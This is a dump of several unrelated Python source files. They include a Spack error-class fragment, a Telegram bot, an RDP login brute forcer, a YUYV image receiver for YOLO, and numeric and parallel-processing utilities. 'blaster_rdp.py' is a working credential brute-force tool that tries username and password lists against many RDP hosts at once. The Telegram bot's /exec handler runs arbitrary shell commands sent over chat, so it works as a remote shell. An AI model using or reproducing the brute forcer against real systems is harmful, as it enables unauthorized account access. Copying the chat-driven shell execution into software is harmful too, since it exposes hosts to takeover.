        if self.build_log and os.path.exists(self.build_log):
            out.write('See build log for details:\n')
            out.write('  %s\n' % self.build_log)
        return out.getvalue()

    def __str__(self):
        return self.message + self.long_message + self.traceback

    def __reduce__(self):
        """__reduce__ is used to serialize (pickle) ChildErrors.

        Return a function to reconstruct a ChildError, along with the
        salient properties we'll need.
        """
        return _make_child_error, (
            self.message,
            self.module,
            self.name,
            self.traceback,
            self.build_log,
            self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
    """Module-level factory used by ``ChildError.__reduce__`` to unpickle."""
    return ChildError(
        msg, module, name, traceback, build_log, context)
class StopPhase(spack.error.SpackError):
    """Pickle-able exception to control stopped builds."""
    def __reduce__(self):
        # Delegate to a module-level factory so instances survive the
        # pipe between build child and parent (see fork()).
        return _make_stop_phase, (self.message, self.long_message)
def _make_stop_phase(msg, long_msg):
    """Rebuild a StopPhase from pickled state (see StopPhase.__reduce__)."""
    return StopPhase(msg, long_msg)
|
all_bots.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: josem
Bot de Telegram que devuelve la IP del servidor
Adaptado de los bots de Alberto disponibles en umucv
"""
# Libreria Telegram
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
# OpenCV
import cv2 as cv
# Enviar bytes
from io import BytesIO
# Para cargar una imagen
from PIL import Image
# Para cargar una imagen dado el path
import skimage.io as io
# Stream de la camara
from umucv.stream import Camera
# Hilos
import threading
# Ejecutar comandos
import subprocess
# Manejo del sistema
import os
# Updater con el token del bot (otorogado por BotFather)
updater = Updater('TOKEN')
# Mi id de usuario de Telegram (otorogado por IDBot)
my_id = 0
# Camara activada
cam_enabled = False
# Camara
if cam_enabled:
cam = Camera(dev='0', size=(640, 480))
# Directorio actual (para execute)
dir_path = subprocess.check_output("pwd").decode('utf-8')[:-1]
# /start command handler
def start(bot, update):
    """Confirm the bot is alive by replying to the incoming message."""
    update.message.reply_text("Estoy vivo!")
# /hello command handler
def hello(bot, update):
    """Greet the sender by their Telegram first name."""
    sender = update.message.from_user.first_name
    update.message.reply_text("Hola {}".format(sender))
# Stops the updater thread and, if enabled, the camera.
def shutdown():
    updater.stop()
    # Unblock updater.idle() so the main thread can exit.
    updater.is_idle = False
    if cam_enabled:
        cam.stop()
# /stop command handler: triggers shutdown() (owner only)
def stop(bot, update):
    """Shut the bot down if the requester is the owner (my_id)."""
    chat_id = update.message.chat_id
    if chat_id != my_id:
        update.message.reply_text("Bot privado!")
        return
    update.message.reply_text("Bye!")
    # Stop from a separate thread so this handler can return first.
    threading.Thread(target=shutdown).start()
# Runs `hostname -I` to obtain this host's IP address
def ip():
    """Return the server's IP address as a UTF-8 string."""
    raw = subprocess.check_output(["hostname", "-I"]).decode('utf-8')
    # Drop the trailing space + newline that `hostname -I` emits.
    return raw[:-2]
# /ip command handler (owner only)
def get_ip(bot, update):
    """Reply with the server's IP address to the owner; refuse others."""
    chat_id = update.message.chat_id
    if chat_id != my_id:
        update.message.reply_text("Bot privado!")
        return
    update.message.reply_text("Mi IP es {}".format(ip()))
# Sends an image to a chat.
def send_image(bot, cid, frame):
    """Encode an OpenCV BGR frame as PNG and send it to chat *cid*."""
    # OpenCV frames are BGR; PIL expects RGB.
    rgb = cv.cvtColor(frame, cv.COLOR_BGR2RGB)
    image = Image.fromarray(rgb, mode='RGB')
    # Serialize the PNG into an in-memory byte stream.
    buffer = BytesIO()
    image.save(buffer, 'PNG')
    # Rewind so the upload reads from the start.
    buffer.seek(0)
    bot.sendPhoto(chat_id=cid, photo=buffer)
# /image command handler: send a webcam capture (owner only)
def get_image(bot, update):
    """Capture a frame from the camera and send it to the owner."""
    chat_id = update.message.chat_id
    if chat_id != my_id:
        update.message.reply_text("Bot privado!")
        return
    if not cam_enabled:
        update.message.reply_text("No hay webcam")
        return
    send_image(bot, chat_id, cam.frame)
# /echo command handler
def echo(bot, update, args):
    """Reply with the command arguments joined by single spaces."""
    reply = " ".join(args)
    update.message.reply_text(reply)
# /exec command handler: run a shell command and reply with its output
def execute(bot, update, args):
    """Run a shell command on behalf of the owner and reply with output.

    A leading ``cd`` updates the remembered working directory instead of
    spawning a shell.  Non-owners get a refusal message.

    SECURITY NOTE: args come straight from a chat message and are passed
    to the shell with shell=True.  That is arbitrary command execution by
    design -- acceptable only because the handler is owner-gated.
    """
    global dir_path
    # Id of the requesting chat
    cid = update.message.chat_id
    if cid != my_id:
        update.message.reply_text("Bot privado!")
        return
    # Prompt = whoami + hostname + cwd, mimicking a shell prompt.
    user = subprocess.check_output("whoami").decode('utf-8')[:-1]
    host = subprocess.check_output("hostname").decode('utf-8')[:-1]
    prompt = user + "@" + host + ":" + dir_path + " $ " + " ".join(args) + "\n"
    # Handle `cd` ourselves: a subshell's cwd change would be lost.
    if args[0] == "cd":
        if len(args) < 2:
            # Bare `cd` goes to the user's home directory.
            dir_path = "/home/"+user
            out = ""
        elif os.path.isdir(args[1]):
            dir_path = args[1]
            out = ""
        else:
            out = "No existe el directorio"
        # Fix: reply and return here.  The original fell through and also
        # executed "cd ..." in a throwaway subshell, which always
        # overwrote `out` (including the missing-directory message).
        update.message.reply_text(prompt+out)
        return
    command = " ".join(args)
    try:
        # shell=True allows pipes and shell syntax in the command string.
        out = subprocess.check_output(command, shell=True, cwd=dir_path).decode('utf-8')[:-1]
    except subprocess.CalledProcessError:
        out = "Error ejecutando el comando (exit status diferente de 0)"
    # Reply with prompt + command output (trailing newline stripped).
    update.message.reply_text(prompt+out)
# Text-message handler: echo the message reversed
def process_text(bot, update):
    """Reply to any plain text message with the text reversed."""
    reversed_text = update.message.text[::-1]
    update.message.reply_text(reversed_text)
# Photo-message handler: reply with dimensions and a grayscale copy
def process_image(bot, update):
    """Report a received photo's size and send back a grayscale version."""
    # Telegram sends several sizes; the last entry is the largest.
    file_id = update.message.photo[-1].file_id
    path = bot.get_file(file_id)['file_path']
    img = io.imread(path)
    # Reply with "<width>x<height>".
    update.message.reply_text("{}x{}".format(img.shape[1], img.shape[0]))
    # Gray, then back to 3 channels so send_image can handle it.
    gray_rgb = cv.cvtColor(cv.cvtColor(img, cv.COLOR_RGB2GRAY), cv.COLOR_GRAY2RGB)
    send_image(bot, update.message.chat_id, gray_rgb)
# Main
def main():
    """Wire up all handlers, start polling, and block until stopped."""
    # Command and message handlers
    updater.dispatcher.add_handler(CommandHandler('start', start))
    updater.dispatcher.add_handler(CommandHandler('hello', hello))
    updater.dispatcher.add_handler(CommandHandler('stop', stop))
    updater.dispatcher.add_handler(CommandHandler('ip', get_ip))
    updater.dispatcher.add_handler(CommandHandler('image', get_image))
    updater.dispatcher.add_handler(CommandHandler('echo', echo, pass_args=True))
    updater.dispatcher.add_handler(CommandHandler('exec', execute, pass_args=True))
    updater.dispatcher.add_handler(MessageHandler(Filters.text, process_text))
    updater.dispatcher.add_handler(MessageHandler(Filters.photo, process_image))
    # Start polling Telegram for updates
    updater.start_polling()
    # Initial message: report the server's IP to the owner
    bot = updater.bot
    bot.sendMessage(chat_id=my_id, text="Mi IP es {}".format(ip()))
    # Block execution until the bot is stopped
    updater.idle()
# Script entry point.
if __name__ == '__main__':
    main()
|
blaster_rdp.py | #!/usr/bin/env python2
# This is
#
#
# by sn0wfa11
import sys
try:
import os
import socket
import multiprocessing
import threading
import argparse
import subprocess
import re
import time
from lib.common import *
from lib.network import *
except Exception, err:
print >> sys.stderr, err
sys.exit(1)
usernames = []
passwords = []
hosts = []
ports = []
xfreerdp_path = "/usr/bin/xfreerdp"
rdp_success = "Authentication only, exit status 0"
global verbose, delay, pairwise
# List import helpers
def get_usernames(filename):
    """Append each non-empty, stripped line of *filename* to `usernames`."""
    check_file(filename)
    with open(filename) as user_file:
        for raw in user_file:
            entry = raw.strip()
            if entry:
                usernames.append(entry)
def get_passwords(filename):
    """Append each non-empty, stripped line of *filename* to `passwords`."""
    check_file(filename)
    with open(filename) as pass_file:
        for raw in pass_file:
            entry = raw.strip()
            if entry:
                passwords.append(entry)
def get_hosts(filename):
    """Feed every line of *filename* through split_host_port()."""
    check_file(filename)
    with open(filename) as host_file:
        for entry in host_file:
            split_host_port(entry)
def split_host_port(host_input):
    """Split "host[:port]" and append to the global hosts/ports lists.

    Blank input contributes nothing; a missing port defaults to 3389.

    NOTE(review): despite the CLI help claiming IPv6 support, a bare
    IPv6 address contains ':' and is mangled by this split -- confirm,
    or require a bracketed [addr]:port format.
    """
    host_port = host_input.split(':')
    host_port = [x.strip() for x in host_port]
    if host_port[0]:
        hosts.append(host_port[0])
        if len(host_port) < 2:
            # No port given: default to the standard RDP port.
            ports.append(3389)
        else:
            ports.append(int(host_port[1]))
# No point spawning more worker processes than there are hosts.
def process_count():
    """Return the worker-pool size: min(number of hosts, CPU count)."""
    return min(len(hosts), multiprocessing.cpu_count())
# Test a single rdp login option
def rdp_connect(host, port, username, password):
    """Try one username:password against host:port via xfreerdp +auth-only.

    NOTE(review): under Python 3 Popen's stderr yields bytes and the ''
    sentinel would never match; the shebang pins this script to Python 2,
    where it works -- confirm before porting.
    """
    match = False
    # +auth-only makes xfreerdp authenticate and exit without a session.
    rdp = subprocess.Popen([xfreerdp_path, "/v:" + host, "/port:" + str(port), "/u:" + username, "/p:" + password, "/cert-ignore", "+auth-only"], shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # xfreerdp reports the auth result on stderr; scan it line by line.
    for line in iter(rdp.stderr.readline, ''):
        if re.search(rdp_success, line):
            match = True
            break
    if match:
        print_good("Login found on " + host + " -> " + username + ":" + password)
    else:
        printv_nomatch(username + ":" + password + " no match on " + host, verbose)
    pass
# Username and password checking
# Spawns a thread for each combination based on pairwise or not
def check_up(host, port, host_event, host_last):
    """Test credentials against one host, one thread per attempt.

    In pairwise mode usernames[i] is tried with passwords[i]; otherwise
    the full cross product is tried.  Reachability is re-checked before
    every attempt so a dead host aborts early.  If *host_last* is set,
    signals *host_event* when done (see run_hosts()).
    """
    if not port_open(host, port):
        print_nomatch("Unable to connect to: " + host + ":" + str(port))
    else:
        up_threads = []
        errored = False
        if pairwise:
            for x in range(0, len(usernames)):
                if not port_open(host, port):
                    print_nomatch("Unable to connect to: " + host + ":" + str(port))
                    break
                else:
                    up_thread = threading.Thread(target=rdp_connect, args=(host, port, usernames[x], passwords[x]))
                    # Small stagger so attempts don't hammer the host at once.
                    time.sleep(0.4)
                    up_thread.start()
                    up_threads.append(up_thread)
        else:
            for username in usernames:
                for password in passwords:
                    if not port_open(host, port):
                        # Remember the failure; the outer loop reports it.
                        errored = True
                        break
                    else:
                        up_thread = threading.Thread(target=rdp_connect, args=(host, port, username, password))
                        time.sleep(0.4)
                        up_thread.start()
                        up_threads.append(up_thread)
                if errored:
                    print_nomatch("Unable to connect to: " + host + ":" + str(port))
                    break
        # Wait for every in-flight attempt before signalling completion.
        for thread in up_threads:
            thread.join()
        if host_last:
            host_event.set()
    pass
# Runs through the host list, multiprocessing by host
def run_hosts():
    """Fan the host list out over a process pool, one check_up per host."""
    host_last = False
    host_pool = multiprocessing.Pool(process_count())
    host_manager = multiprocessing.Manager()
    # Event set by the worker handling the final host; used as a barrier.
    host_event = host_manager.Event()
    for x in range(0, len(hosts)):
        # NOTE(review): this compares by value, so a duplicate of the
        # final host earlier in the list flags "last" prematurely --
        # confirm hosts are unique or compare the index instead.
        if hosts[x] == hosts[len(hosts) - 1]:
            host_last = True
        host_pool.apply_async(check_up, (hosts[x], ports[x], host_event, host_last))
    host_pool.close()
    host_event.wait()
    host_pool.terminate()
# Argument parsing / validation
def parse_args(args, parser):
    """Populate the global host/username/password lists from CLI args.

    Exits via print_exit() when any of the three lists ends up empty.
    """
    global verbose, delay, pairwise
    verbose = args.verbose
    pairwise = args.pairwise
    if args.host:
        split_host_port(args.host)
    if args.host_file:
        get_hosts(args.host_file)
    if not hosts:
        print_exit("You must specify at least one host!", parser)
    if args.username:
        usernames.append(args.username)
    if args.user_file:
        get_usernames(args.user_file)
    if not usernames:
        print_exit("You must specify at least one username!", parser)
    if args.password:
        passwords.append(args.password)
    if args.pass_file:
        get_passwords(args.pass_file)
    if not passwords:
        print_exit("You must specify at least one password!", parser)
# Main Function
def main(argv):
    """Parse CLI options, validate inputs, and run the brute force."""
    parser = argparse.ArgumentParser(description = "RDP login brute forcer.")
    parser.add_argument("-u", "--username", type = str, help = "Single username to test")
    parser.add_argument("-U", "--user_file", type = str, help = "File containing usernames. One per line.")
    parser.add_argument("-p", "--password", type = str, help = "Single password to test")
    parser.add_argument("-P", "--pass_file", type = str, help = "File containing passwords. One per line.")
    parser.add_argument("-t", "--host", type = str, help = "Single host to test. <host> or <host>:<port> IPv6 is ok too.")
    parser.add_argument("-T", "--host_file", type = str, help = "File containing hosts. One per line. <host> or <host>:<port> IPv6 is ok too.")
    parser.add_argument("-v", "--verbose", action = "store_true", help = "Display all host:username:password tests.")
    parser.add_argument("-w", "--pairwise", action = "store_true", help = "Test username and password combos in line by line match. Must have same number of each!")
    args = parser.parse_args()
    # With no CLI arguments at all, show usage and exit.
    if len(argv) == 1:
        help_exit(parser)
    parse_args(args, parser)
    print_status("Starting brute force...")
    # Pairwise mode pairs usernames[i] with passwords[i]; counts must match.
    if pairwise and (len(usernames) != len(passwords)):
        print_error("Username and password numbers do not match in pairwise mode! Exiting...")
        sys.exit(4)
    run_hosts()
    print_status("Done.")
# Script entry point; Ctrl-C exits with status 3 (Python 2 script).
if __name__ == "__main__":
    try:
        main(sys.argv)
    except KeyboardInterrupt:
        print "\n\n[*] Exiting..."
        sys.exit(3)
|
test.py | import socket as s
import struct
import numpy as np
import threading
import yolo
# TCP server socket: listens on <hostname>:4444 for the image stream.
port = 4444
serversocket = s.socket()
serversocket.bind((s.gethostname(), port))
serversocket.listen()
def udp_thread():
    """Run a simple UDP echo server on port 4445 (discovery/keepalive)."""
    sock = s.socket(s.AF_INET, s.SOCK_DGRAM)
    sock.bind((s.gethostname(), 4445))
    print('Waiting for udp message!')
    while True:
        message, sender = sock.recvfrom(256)
        print('Recieved udp message from {}'.format(sender))
        # Echo the datagram back to whoever sent it.
        sock.sendto(message, sender)
# Run the UDP echo server in the background; daemon so it dies with main.
thread = threading.Thread(target = udp_thread, args=())
thread.daemon = True
thread.start()
print('Waiting for connection...')
# Block until the (single) TCP client connects.  Note: the connected
# socket is named `socket`; the module is imported as `s` above.
socket, addr = serversocket.accept()
print('Connected!')
def recieve(socket, msg_len):
    """Read exactly *msg_len* bytes from *socket*.

    Raises RuntimeError if the peer closes before the full message
    arrives.  (Name kept as-is: callers use the original spelling.)
    """
    parts = []
    received = 0
    while received < msg_len:
        part = socket.recv(min(msg_len - received, 2048))
        if part == b'':
            raise RuntimeError("socket connection broken")
        parts.append(part)
        received += len(part)
    return b''.join(parts)


def recieve_int(socket):
    """Read a 4-byte big-endian signed int from *socket*."""
    return struct.unpack('!i', recieve(socket, 4))[0]


def send_int(socket, num):
    """Send *num* as a 4-byte big-endian signed int."""
    socket.sendall(struct.pack('!i', num))
def bytes_to_img(arr, width, height):
    """Decode packed YUYV bytes into a (height, width, 3) float32 RGB array.

    Every 4 bytes encode two horizontally adjacent pixels that share
    their U and V chroma samples.
    """
    img = np.zeros((height, width, 3), dtype=np.float32)
    for i in range(0, len(arr), 4):
        y1, u, y2, v = (int(b) for b in arr[i:i + 4])
        # Two bytes per pixel, so a row spans width*2 bytes.
        col = (i % (width * 2)) // 2
        row = i // (width * 2)
        img[row, col] = yuv_to_rgb(y1, u, v)
        img[row, col + 1] = yuv_to_rgb(y2, u, v)
    return img


def clamp(num, low, high):
    """Clamp *num* into the inclusive range [low, high]."""
    return max(low, min(num, high))


def yuv_to_rgb(y, u, v):
    """Convert one YUV (BT.601 video-range) sample to an (r, g, b) tuple."""
    c = y - 16
    d = u - 128
    e = v - 128
    red = (298 * c + 409 * e + 128) / 256
    green = (298 * c - 100 * d - 208 * e + 128) / 256
    blue = (298 * c + 516 * d + 128) / 256
    return clamp(red, 0, 255), clamp(green, 0, 255), clamp(blue, 0, 255)
images = []
# Main receive loop.  Protocol per frame: int32 width, int32 height,
# int32 payload length, then `length` bytes of packed YUYV pixel data.
while True:
    img_width = recieve_int(socket)
    img_height = recieve_int(socket)
    # Recieve image bytes and convert to np array
    msg_len = recieve_int(socket)
    raw_data = recieve(socket, msg_len)
    img_data = bytes_to_img(raw_data, img_width, img_height)
    # Keep a normalized ([0, 1]) copy of every frame.
    images.append(img_data/255)
    # Run person detection on the raw-range frame and report the result.
    bounds = yolo.get_pred(img_data, 'person')
    print('Pred: {}'.format(bounds))
utilities.py | import inspect
import signal
import random
import time
import traceback
import sys
import os
import subprocess
import math
import pickle as pickle
from itertools import chain
import heapq
import hashlib
def computeMD5hash(my_string):
    # {{{
    """Return the hex MD5 digest of *my_string* (UTF-8 encoded)."""
    # https://stackoverflow.com/questions/13259691/convert-string-to-md5
    digest = hashlib.md5(my_string.encode("utf-8"))
    return digest.hexdigest()
    # }}}
class Thunk(object):
    # {{{
    """Lazy evaluation: wrap a zero-argument callable, cache its result."""

    def __init__(self, thing):
        # {{{
        # `thing` is the unevaluated callable until force() replaces it
        # with its result.
        self.thing = thing
        self.evaluated = False
        # }}}

    def force(self):
        # {{{
        """Evaluate the wrapped callable (at most once) and return its value."""
        if not self.evaluated:
            self.thing = self.thing()
            self.evaluated = True
        return self.thing
        # }}}
    # }}}
def cindex(i):
    # {{{
    """Return a function that extracts element *i* from its argument."""
    def pick(sequence):
        return sequence[i]
    return pick
    # }}}
class ConstantFunction:
    # {{{
    """Callable that ignores all arguments and always returns *v*."""

    def __init__(self, v):
        # {{{
        self.v = v
        # }}}

    def __call__(self, *args, **kwargs):
        # {{{
        return self.v
        # }}}
    # }}}
def eprint(*args, **kwargs):
    # {{{
    """print() to stderr, then flush all output streams."""
    print(*args, file=sys.stderr, **kwargs)
    # flushEverything is defined elsewhere in this module.
    flushEverything()
    # }}}
class Bunch(object):
    # {{{
    """Expose a dict's keys both as attributes and as items."""

    def __init__(self, d):
        # {{{
        # Copy the mapping straight into the instance namespace.
        self.__dict__.update(d)
        # }}}

    def __setitem__(self, key, item):
        # {{{
        self.__dict__[key] = item
        # }}}

    def __getitem__(self, key):
        # {{{
        return self.__dict__[key]
        # }}}
    # }}}
def curry(fn):
    """Curries a function. Hacky way to return a curried version of functions with arbitrary #s of args."""
    # {{{
    def make_curry_fn(signature):
        """Redefines a currying function with the appropriate arguments. Hacky."""
        # {{{
        # Builds source text like:
        #   def tmp_curry(f): return lambda a: lambda b: f(a, b)
        # one nested lambda per parameter of the curried function.
        tmp_curry = "def tmp_curry(f): return "
        tmp_curry += " ".join(
            ["lambda %s: " % argname for argname in signature.parameters]
        )
        tmp_curry += "f"
        tmp_curry += str(signature)
        return tmp_curry
        # }}}

    # NOTE(review): exec injects `tmp_curry` into module globals() -- a
    # side effect that is not thread-safe and is overwritten per call.
    exec(make_curry_fn(inspect.signature(fn)), globals())
    return tmp_curry(fn)
    # }}}
class Curried:
# {{{
def __init__(self, f, arguments=None, arity=None):
# {{{
if arity is None:
arity = len(inspect.getargspec(f)[0])
self.f = f
self.arity = arity
if arguments is None:
arguments = []
self.arguments = arguments
# }}}
def __call__(self, x):
# {{{
arguments = self.arguments + [x]
if len(arguments) == self.arity:
return self.f(*arguments)
else:
return Curried(self.f, arguments=arguments, arity=self.arity)
# }}}
def __str__(self):
# {{{
if len(self.arguments) == 0:
return f"Curried({self.f}/{self.arity})"
else:
return (
f"Curried({self.f}/{self.arity}, {', '.join(map(str,self.arguments))})"
)
# }}}
def __repr__(self):
# {{{
return str(self)
# }}}
# }}}
def hashable(v):
    """Determine whether `v` can be hashed."""
    # {{{
    try:
        hash(v)
        return True
    except TypeError:
        return False
    # }}}
def flatten(x, abort=lambda x: False):
    """Recursively unroll iterables, yielding the non-iterable leaves.

    Args:
        x: a value or arbitrarily nested iterable.
        abort: predicate; when true for a value, yield it unexpanded.

    str/bytes are treated as atoms.  The original recursed into their
    characters -- and every 1-character string is again iterable, so any
    string leaf previously hit the recursion limit (RecursionError).
    """
    # {{{
    if abort(x) or isinstance(x, (str, bytes)):
        yield x
        return
    try:
        yield from chain(*(flatten(i, abort) for i in x))
    except TypeError:  # not iterable
        yield x
    # }}}
# {{{
def growImage(i, iterations=2):
    """Dilate a monochromatic RGBA image by one pixel per iteration.

    Args:
        i: numpy array of shape (H, W, 4); the alpha channel (index 3)
           marks the foreground.  Assumed to be single-colored.
        iterations: number of one-pixel growth steps.

    Returns:
        An array of the same shape with the foreground grown (the input
        object itself when iterations == 0).
    """
    import numpy as np

    for _ in range(iterations):
        grown = np.zeros(i.shape)
        # assume it is monochromatic and get the color
        color = np.array([i[:, :, channel].max() for channel in range(4)])
        # assume that the alpha channel indicates where the foreground is
        foreground = i[:, :, 3] > 0
        # Union of the mask with its four 1-pixel shifts (up/down/left/right).
        foreground = (
            foreground
            + np.pad(foreground, ((0, 1), (0, 0)), mode="constant")[1:, :]
            + np.pad(foreground, ((0, 0), (0, 1)), mode="constant")[:, 1:]
            + np.pad(foreground, ((0, 0), (1, 0)), mode="constant")[:, :-1]
            + np.pad(foreground, ((1, 0), (0, 0)), mode="constant")[:-1, :]
        )
        grown[foreground] = color
        i = grown
    # Fix: return `i`, not the loop-local buffer -- the original returned
    # `ip`, which raised NameError when iterations == 0.
    return i
# }}}
def summaryStatistics(n, times):
    # {{{
    """Print mean/median/max/stddev of *times* to stderr, labeled *n*.

    mean/median/standardDeviation are helpers defined elsewhere in this
    module; the `+ 0.5` before int() rounds to the nearest second.
    """
    if len(times) == 0:
        eprint(n, "no successful times to report statistics on!")
    else:
        eprint(
            n,
            "average: ",
            int(mean(times) + 0.5),
            "sec.\tmedian:",
            int(median(times) + 0.5),
            "\tmax:",
            int(max(times) + 0.5),
            "\tstandard deviation",
            int(standardDeviation(times) + 0.5),
        )
    # }}}
# Kept as a standalone helper: callers may clear these metrics each loop
# (a user option), so the merge logic lives in one place.
def updateTaskSummaryMetrics(taskSummaryMetrics, newMetricsDict, key):
    """Updates a taskSummaryMetrics dict from tasks -> metrics with new metrics under the given key."""
    # {{{
    for task, metric in newMetricsDict.items():
        taskSummaryMetrics.setdefault(task, {})[key] = metric
    # }}}
NEGATIVEINFINITY = float("-inf")
POSITIVEINFINITY = float("inf")
PARALLELMAPDATA = None
PARALLELBASESEED = None
def parallelMap(
    # {{{
    numberOfCPUs,
    f,
    *xs,
    chunksize=None,
    maxtasksperchild=None,
    memorySensitive=False,
    seedRandom=False,
):
    # }}}
    """Map *f* over the parallel sequences *xs* using a process pool.

    Results come back in input order.  Communicates (f, xs) to the
    forked workers through the PARALLELMAPDATA module global, so this
    function is NOT re-entrant (the asserts below enforce that).

    seedRandom: Should each parallel worker be given a different random seed?
    """
    # {{{
    global PARALLELMAPDATA
    global PARALLELBASESEED
    if memorySensitive:
        # Scale the CPU count down when memory pressure is already high.
        memoryUsage = getMemoryUsageFraction() / 100.0
        correctedCPUs = max(1, min(int(0.9 / memoryUsage), numberOfCPUs))
        assert correctedCPUs <= numberOfCPUs
        assert correctedCPUs >= 1
        if correctedCPUs < numberOfCPUs:
            eprint(
                "In order to not use all of the memory on the machine (%f gb), we are limiting this parallel map to only use %d CPUs"
                % (howManyGigabytesOfMemory(), correctedCPUs)
            )
        numberOfCPUs = correctedCPUs
    if numberOfCPUs == 1:
        # Serial fast path: no pool, no globals touched.
        return list(map(f, *xs))
    n = len(xs[0])
    for x in xs:
        assert len(x) == n
    assert PARALLELMAPDATA is None
    PARALLELMAPDATA = (f, xs)
    assert PARALLELBASESEED is None
    if seedRandom:
        PARALLELBASESEED = random.random()
    from multiprocessing import Pool

    # Randomize the order in case easier ones come earlier or later
    permutation = list(range(n))
    random.shuffle(permutation)
    inversePermutation = dict(zip(permutation, range(n)))
    # Batch size of jobs as they are sent to processes
    if chunksize is None:
        chunksize = max(1, n // (numberOfCPUs * 2))
    pool = Pool(numberOfCPUs, maxtasksperchild=maxtasksperchild)
    ys = pool.map(parallelMapCallBack, permutation, chunksize=chunksize)
    pool.terminate()
    PARALLELMAPDATA = None
    PARALLELBASESEED = None
    # Undo the shuffle so results line up with the inputs.
    return [ys[inversePermutation[j]] for j in range(n)]
    # }}}
def parallelMapCallBack(j):
    # {{{
    """Worker-side trampoline for parallelMap.

    Runs in a pool worker; reads (f, xs) from the PARALLELMAPDATA global
    inherited at fork time, optionally reseeds `random` per index, and
    evaluates f on the j-th elements of the argument sequences.
    """
    global PARALLELMAPDATA
    global PARALLELBASESEED
    if PARALLELBASESEED is not None:
        random.seed(PARALLELBASESEED + j)
    f, xs = PARALLELMAPDATA
    try:
        return f(*[x[j] for x in xs])
    except Exception as e:
        # Log in the worker (the parent only sees a re-raised pickle).
        eprint(
            "Exception in worker during lightweight parallel map:\n%s"
            % (traceback.format_exc())
        )
        raise e
    # }}}
def log(x):
    # {{{
    """Natural log; 0 maps to -inf, non-numbers delegate to their .log() method."""
    if type(x) in (int, float):
        return NEGATIVEINFINITY if x == 0 else math.log(x)
    return x.log()
    # }}}
def exp(x):
    # {{{
    """Exponential; numbers go through math.exp, everything else via x.exp()."""
    if type(x) in (int, float):
        return math.exp(x)
    return x.exp()
    # }}}
def lse(x, y=None):
    # {{{
    """Numerically stable log-sum-exp.

    One-argument form: `x` is a non-empty sequence of log-values (plain
    numbers or torch tensors); returns log(sum(exp(x_i))).
    Two-argument form: returns log(exp(x) + exp(y)), treating
    NEGATIVEINFINITY as the additive identity.
    """
    if y is None:
        largest = None
        if len(x) == 0:
            raise Exception("LSE: Empty sequence")
        if len(x) == 1:
            return x[0]
        # If these are just numbers...
        t = type(x[0])
        if t == int or t == float:
            # Subtract the max before exponentiating to avoid overflow.
            largest = max(*x)
            return largest + math.log(sum(math.exp(z - largest) for z in x))
        # added clause to avoid zero -dim tensor problem
        import torch
        if t == torch.Tensor and x[0].size() == torch.Size([]):
            return torchSoftMax([datum.view(1) for datum in x])
        # Must be torch
        return torchSoftMax(x)
    else:
        # Short-circuit the additive identities.
        if x is NEGATIVEINFINITY:
            return y
        if y is NEGATIVEINFINITY:
            return x
        tx = type(x)
        ty = type(y)
        if (ty == int or ty == float) and (tx == int or tx == float):
            # Factor out the larger term for numerical stability.
            if x > y:
                return x + math.log(1.0 + math.exp(y - x))
            else:
                return y + math.log(1.0 + math.exp(x - y))
        return torchSoftMax(x, y)
    # }}}
def torchSoftMax(x, y=None):
    # {{{
    """Log-sum-exp for torch tensors.

    With one argument, `x` is a 1-D tensor (or a list of 1-element tensors,
    which gets concatenated); with two, `x` and `y` are concatenated.
    Uses the identity logsumexp(v) = v[0] - log_softmax(v)[0].
    """
    from torch.nn.functional import log_softmax
    import torch
    if y is None:
        if isinstance(x, list):
            x = torch.cat(x)
        return (x - log_softmax(x, dim=0))[0]
    x = torch.cat((x, y))
    # this is so stupid
    return (x - log_softmax(x, dim=0))[0]
    # }}}
def invalid(x):
    # {{{
    """True when x is NaN or +/- infinity."""
    return not math.isfinite(x)
    # }}}
def valid(x):
    # {{{
    """True when x is a finite number."""
    return math.isfinite(x)
    # }}}
def forkCallBack(x):
    # {{{
    """Unpack a [function, args, kwargs] triple and invoke it, logging and
    re-raising any exception so the parent process can see the traceback."""
    func, args, kwargs = x
    try:
        return func(*args, **kwargs)
    except Exception as e:
        eprint("Exception in worker during forking:\n%s" % (traceback.format_exc()))
        raise e
    # }}}
def callFork(f, *arguments, **kw):
    # {{{
    """Forks a new process to execute the call. Blocks until the call completes.

    f: function to run in the child (must be picklable along with its args).
    Returns f's return value, marshalled back from the child.
    Exceptions raised by f propagate out of the pool.

    Removed an unused `global FORKPARAMETERS` declaration: the name was
    never read or written in this function.
    """
    from multiprocessing import Pool
    # A single-worker pool gives us fork + result marshalling for free.
    workers = Pool(1)
    ys = workers.map(forkCallBack, [[f, arguments, kw]])
    workers.terminate()
    assert len(ys) == 1
    return ys[0]
    # }}}
PARALLELPROCESSDATA = None
def launchParallelProcess(f, *a, **k):
    # {{{
    """Start f(*a, **k) in a detached multiprocessing.Process and return it.

    Arguments are handed to the child via the module global
    PARALLELPROCESSDATA, read back in _launchParallelProcess.
    NOTE(review): this relies on the 'fork' start method — under 'spawn'
    the child re-imports the module and would see PARALLELPROCESSDATA = None.
    """
    global PARALLELPROCESSDATA
    PARALLELPROCESSDATA = [f, a, k]
    from multiprocessing import Process
    p = Process(target=_launchParallelProcess, args=tuple([]))
    p.start()
    # Safe to clear immediately: the child received a copy at fork time.
    PARALLELPROCESSDATA = None
    return p
    # }}}
def _launchParallelProcess():
    # {{{
    """Child-process entry point: run the call stored in PARALLELPROCESSDATA."""
    global PARALLELPROCESSDATA
    [f, a, k] = PARALLELPROCESSDATA
    try:
        f(*a, **k)
    except Exception as e:
        # Print the traceback in the child; it would otherwise be invisible.
        eprint("Exception in worker during forking:\n%s" % (traceback.format_exc()))
        raise e
    # }}}
def jsonBinaryInvoke(binary, message):
    # {{{
    """Run `binary`, feed it `message` as JSON on stdin, parse stdout as JSON.

    binary: executable path/name (string or argv list), started without a shell.
    message: any JSON-serializable object.
    Returns the decoded JSON response.  On unparseable output, dumps the
    exchange to /tmp/_message and /tmp/_response for post-mortem debugging
    and re-raises the parse error.

    Cleanups vs. the original: dropped a no-op `except OSError: raise exc`
    wrapper, an unused `import os`, and the unused stderr capture.
    """
    import json
    import subprocess
    message = json.dumps(message)
    process = subprocess.Popen(
        binary, stdin=subprocess.PIPE, stdout=subprocess.PIPE
    )
    # communicate() writes stdin, closes it, and collects all of stdout.
    response, _ = process.communicate(message.encode("utf-8"))
    try:
        response = json.loads(response.decode("utf-8"))
    except Exception as e:
        eprint("Could not parse json.")
        with open("/tmp/_message", "w") as handle:
            handle.write(message)
        with open("/tmp/_response", "w") as handle:
